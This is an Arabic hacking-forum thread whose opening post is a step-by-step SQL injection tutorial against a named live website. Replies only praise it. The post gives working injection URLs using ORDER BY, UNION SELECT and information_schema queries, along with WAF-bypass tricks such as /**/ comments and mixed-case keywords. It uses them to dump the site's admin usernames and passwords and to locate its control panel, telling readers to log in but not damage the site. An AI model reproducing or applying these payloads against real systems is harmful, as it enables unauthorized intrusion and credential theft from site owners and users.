اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

احترف sql injection

احترف sql injection


النتائج 1 إلى 6 من 6

الموضوع: احترف sql injection

  1. #1
    هكر مبتديء Array الصورة الرمزية احمد24
    تاريخ التسجيل
    Nov 2010
    المشاركات
    12

    افتراضي احترف sql injection



    بسم الله الرحمن الرحيم
    السلام عليكم ورحمة الله وبركاته


    حبيت اقدم لكم هذا الدرس الشامل ل 90% مما تعلمته من sql injection

    وان شاء الله رح نطبق على موقع مصاب

    بشرط يا اخواني انو ما نخرب الموقع حتى يستفيد الاخرين وما نكون انانين حتى لا يغلق الموقع

    يعني نستخرج الباس واليوزر وندخل لوحة التحكم بس وما نعمل اشي بالموقع
    نبدا على بركة الله
    هذا هو الموقع المصاب
    http://watchtowerhypocrisy.com/index.php?id=11

    الخطوة الاولى :

    نضع ' التي تدعى single cotation وهي كبسة حرف الطاء ولكن عندما تكون اللغة بالانجليزي

    بعد الرقم 11
    فيصبح الرابط هكذا

    http://watchtowerhypocrisy.com/index.php?id=11'
    نلاحظ ظهور خطا sql

    الخطوة الثانيه :

    معرفة عدد العواميد المصابه

    نحذف ال ' التي اضفناها ونضع الامر odred by 1-- فيصبح الرابط هكذا

    http://watchtowerhypocrisy.com/index.php?id=11 order by 1--

    نلاحظ اختفاء الخطا والان نزود الرقم ونضع بدلا من الواحد عدد اكبر مثلا 10 لم يظهر خطا

    نزود الى 14 نلاحظ ظهور خطا نرجع الى 13 نلاحظ اختفاء الخطا اذا عدد العواميد المصابه 13 عمود
    وهذا الرابط النهائي

    http://watchtowerhypocrisy.com/index.php?id=11 20order by 13--

    الخطوه الثالثه:

    تحديد العمود المصاب فعليا

    نعود الى الرابط الاصلي http://watchtowerhypocrisy.com/index.php?id=11
    نضع الامر union select 1,2,3,4,5,6,7,8,9,10,11,12,13--

    نعد حتى الرقم 13 وهو عدد الاعمده المصابه فيصبح الرابط هكذا

    http://watchtowerhypocrisy.com/index.php?id=11 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--

    احدى المشاكل التي تواجهنا هي ال Forbidden

    كيف نتخطاها؟؟؟؟؟؟؟؟؟
    نضع قبل وبعد كلمة union هذا الرمز /**/ فيصبح الرابط هكذا

    http://watchtowerhypocrisy.com/index.php?id=11 /**/union/**/ select 1,2,3,4,5,6,7,8,9,10,11,12,13--

    اذا ظهرت مره اخرى ال Forbidden نضع الرمز /**/ قبل وبعد الامر select ايضا
    نلاحظ اختفاء الخطا

    ولكن لم يظهر العمود المصاب لماذا؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

    لاننا لم نضع اشارة الناقص قبل الرقم 11 وهو المتغير الموجود بالرابط الاصلي

    اذا بعد وضع الناقص يصبح الرابط هكذا ويظر العمود المصاب وهو 2 و 6

    http://watchtowerhypocrisy.com/index.php?id=-11 /**/union/**/ select 1,2,3,4,5,6,7,8,9,10,11,12,13--

    الخطوة الرابعه:

    معرفة اصدار القاعده

    نضع مكان الرقم العمود المصاب (يعني مكان الرقم 2 او 6)الامر version() فيصبح الاستغلال هكذا

    http://watchtowerhypocrisy.com/index.php?id=-11 /**/union/**/ select 1,version(),3,4,5,6,7,8,9,10,11,12,13--
    اذا الاصدار 5 نستمر..........................


    الخطوة الخامسه:

    معرفة اسماء الجداول
    نكمل على الاستغلال السابق يعني بعد الرقم 13

    نكتب from information_schema.tables

    ونكتب مكان العمود المصاب table_name

    نلاحظ ظهور ال forbiden جننتنا هاي !!!!!!!!!!!! ههههههههه

    طيب نضع /**/ قبل وبعد information_schema

    يعني هكذا يصبح الامر

    نكتب from /**/information_schema/**/.tables

    الاستغلال النهائي
    http://watchtowerhypocrisy.com/index.php?id=-11 /**/union/**/ select 1,table_name,3,4,5,6,7,8,9,10,11,12,13 from /**/information_schema/**/.tables--
    طيب حتقلي ظهر عمود واحد فقط انا بجاوب؟؟؟؟؟

    على نفس الاستغلال نضع بدلا من table_name التي كتبناها مكان العمود المصاب الامر
    group_concat(table_name)
    يصبح الاستغلال هكذا

    http://watchtowerhypocrisy.com/index.php?id=-11 /**/union/**/ select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12, 13 from /**/information_schema/**/.tables--

    ولكن ظهرت ال forbiden جننتانا على الاخر هاي هههه

    طيب نتخطاها نضع /**/ قبل group_concat

    نلاحظ ما زبط
    طيب هناك طريقه اخرى غير حرف من احرف group_concat من حرف صغير الى حرف كبير
    مثلا انا اغير اول حرف من كل كلمه

    Group_Concat
    الاستغلال النهائي

    http://watchtowerhypocrisy.com/index.php?id=-11 /**/union/**/ select 1,Group_Concat(table_name),3,4,5,6,7,8,9,10,11,12, 13 from /**/information_schema/**/.tables--

    ظهرت الاعمده يا سلام نفتش في الاعمده المكتوبه باحرف صغيره على admin او user او member او Login
    او اي شي قريب من هذه المعاني دقق النظر رح تلاقي admin

    هلا رح اضع الاوامر الاخرى وانت عليك تفهمها حاسس حالي بشرح لولد بصف اول ههههه

    الخطوة السادسه

    http://watchtowerhypocrisy.com/index...,9,10,11,12,13 from /**/information_schema/**/.columns where table_name like char()--
    بين القوسين رح نحط اسم الجدول وهو admin ولكن بتشفير الهكس هذا موقع للتشفير

    http://shrsd.comli.com/ascii_conv.html

    نكتب %admin% وننسخ الرقم ونضعه بين القوسين اللي بالخط الكبير في الرابط السابق

    http://watchtowerhypocrisy.com/index...,9,10,11,12,13 from /**/information_schema/**/.columns where table_name like char(97, 100, 109, 105, 110)--

    طلع اسماء الاعمدة احنا يهمنا ال الاسم والباس

    الان الامر التالي
    http://watchtowerhypocrisy.com/index.php?id=-11 /**/union/**/ select 1,Group_Concat(password,0x3a,username),3,4,5,6,7,8 ,9,10,11,12,13 from admin--

    الان نبحث عن لوحة التحكم باستخدام برنامج Havij

    ملاحظة ممكن المواقع تحط اكثر من لوحة ادمن للتمويه انت جرب الدخول عليها كلها

    ومبروك الدخول الى لوحة التحكم

    لوحة التحكم هي
    http://watchtowerhypocrisy.com/control/

    ارجو ان اكون وفق في هذا الشرح



  2. #2
    هكر متميز Array
    تاريخ التسجيل
    May 2010
    المشاركات
    1,950

    افتراضي رد: احترف sql injection

    الله الله الله ... كبير ياحمد ...

    شرح كبير من عضو مبدع ....


  3. #3
    هكر مبتديء Array الصورة الرمزية احمد24
    تاريخ التسجيل
    Nov 2010
    المشاركات
    12

    افتراضي رد: احترف sql injection

    اقتباس المشاركة الأصلية كتبت بواسطة e . V . E . L مشاهدة المشاركة
    الله الله الله ... كبير ياحمد ...

    شرح كبير من عضو مبدع ....
    شهادة اعتز وافتخر بها



  4. #4
    هكر مجتهد Array الصورة الرمزية Crypto Seven
    تاريخ التسجيل
    Jul 2010
    الدولة
    L!nux Zone
    المشاركات
    334

    افتراضي رد: احترف sql injection

    و الله الشرح روعة مشكووووور يا بطل


  5. #5
    هكر مبتديء Array
    تاريخ التسجيل
    Dec 2010
    المشاركات
    17

    افتراضي رد: احترف sql injection

    machkouuuuuuuuuuuuuuuuuuuuuur


  6. #6
    محظور Array
    تاريخ التسجيل
    Jul 2010
    الدولة
    dark
    المشاركات
    1,130

    افتراضي رد: احترف sql injection

    شرح جميل ومفصل واصل يا غالي ........



المواضيع المتشابهه

  1. احترف تشفير الهيكس لتشفير برامج التشفير و الدمج
    بواسطة ASDELY-ScOrPiOn في المنتدى أدوات اختراق الاجهزة والدمج والتشفير
    مشاركات: 31
    آخر مشاركة: 05-14-2012, 02:21 PM
  2. مشاركات: 16
    آخر مشاركة: 05-11-2012, 06:27 PM
  3. طريقة احترف اوكسر شفرات اكراك
    بواسطة السيد مارس في المنتدى منتدى لغات البرمجة
    مشاركات: 8
    آخر مشاركة: 03-29-2011, 10:47 PM
  4. احترف اختراق الجهزة من الصفر الى الاحتراف هذه فرصتك
    بواسطة pSyCh0_3D في المنتدى قسم اختراق الأجهزة
    مشاركات: 9
    آخر مشاركة: 01-09-2011, 01:20 AM
  5. احترف استعمال اوامر run موضوع شامل
    بواسطة nazgul في المنتدى قسم اختراق الأجهزة
    مشاركات: 0
    آخر مشاركة: 10-29-2010, 09:05 PM

وجد الزوار هذه الصفحة بالبحث عن:

احتراف sql injection

تحديد العمود المصاب

احترف الحقن

sql injection احترافكيفية كتابة الرموز البرمجية مثل ال سنجل كوتيشناحتراف حقن sqlاحتراف في sql injectionاحتراف الحقن تغراة sqlضهور الخطا في العمود الاول sqlدورة احتراف ... sql injectionشرح مفصل لبرنامج havij site:www.aljyyosh.com

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •